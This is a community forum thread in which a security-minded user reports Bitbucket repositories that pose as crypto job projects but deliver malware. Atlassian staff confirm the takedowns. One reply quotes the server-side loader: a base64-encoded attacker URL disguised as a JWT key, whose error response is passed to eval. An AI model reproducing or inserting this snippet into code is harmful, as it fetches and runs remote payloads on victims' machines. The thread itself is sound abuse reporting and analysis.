Create
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 
Sign up Log in
Product Q&A
See all
Community resources
Top groups
Explore all groups
Community resources
Learn
Community resources
Events
Community resources

This repo contains dangerous JavaScript code to download malware

harsh0707051
harsh0707051 January 28, 2025


https://bitbucket.org/sarostechwork/futuremike/src/main/


Some guy reached out via linkedin for so called crypto projects and are urging people to run on bare metal instead of docker. I found out https://github.com/primno/dpapi to be malicious package which is downloaded by the project.  Reddit thread

https://tria.ge/250122-je84vawkfj/behavioral18 says it downloads an executable. 

Note: As a security researcher, I always run everything inside VM or docker so I am safe but if you are reading this and have executed it without docker or VM, I urge you to change all your banking, crypto, internet passwords. But before that wipe out entire system and reinstall everything.

Answer
Watch
Like Hana Kučerová likes this
247 views

2 answers

0 votes
Andy Heinzer
Andy Heinzer
Atlassian Team
Atlassian Team members are employees working across the company in a wide variety of roles.
January 29, 2025

Hi @harsh0707051 

Thanks for reporting this to us.  This repo has been taken down.

View More Comments
harsh0707051
harsh0707051 January 29, 2025

@Andy Heinzer Here is another one such repository. Please take it down as well. :)

https://bitbucket.org/mike_2025/dex_v2_mvp/src/main/

Based on the analysis it seems like this infects system based on following way:

https://bitbucket.org/mike_2025/dex_v2_mvp/src/43c1745d5cd72c9a44fc3390a42e212c00860ed8/server/controllers/userController.js?at=main#lines-216

the javascript function calls an pretty good hidden host with code below and upon getting the error result (which this url is throwing & can be command & control center / dynamic ip host my malicious actor). The result is obscured code. That result might be dowloading something which they are decrypting with https://github.com/primno/dpapi and that's why https://tria.ge/250122-je84vawkfj/behavioral18 might've tagged it for potential malware based on behaviour analysis.
 

```

const JWT_KEY = "aHR0cDovL2JsYXN0YXBpLm9yZy9hcGkvc2VydmljZS90b2tlbi8xMWFiNzU5ZDE4OWRjOGJjMjM4Y2IyNTI1ZjA1Yjg4Yw==";

const getToken = (async () => {
await axios.get(atob(JWT_KEY))
.then(res=>res.data)
.catch(err=>eval(err.response.data));
})();

```


Since it is running on server side in express js, it just downloads arbitrary obscure javascript payload and is further downloading malware from that.

And that's how they are infecting users!!

Like
Andy Heinzer
Andy Heinzer
Atlassian Team
Atlassian Team members are employees working across the company in a wide variety of roles.
January 30, 2025

Thanks @harsh0707051 

I relayed this to my team. The have taken down the bitbucket repo and suspended the user in question.

 

Like
Reply
0 votes
Mikael Sandberg
Mikael Sandberg
Community Leader
Community Leader
Community Leaders are connectors, ambassadors, and mentors. On the online community, they serve as thought leaders, product experts, and moderators.
Become a leader
January 28, 2025

Hi @harsh0707051,

Welcome to Atlassian Community!

You can report this to abuse@atlassian.com. The mailbox will never respond to submissions, but the info sent there is reviewed by Atlassian's anti-abuse team. 

Reply

Suggest an answer

Log in or Sign up to answer
Bitbucket
Bitbucket
DEPLOYMENT TYPE
CLOUD
TAGS
AUG Leaders

Atlassian Community Events

    See all events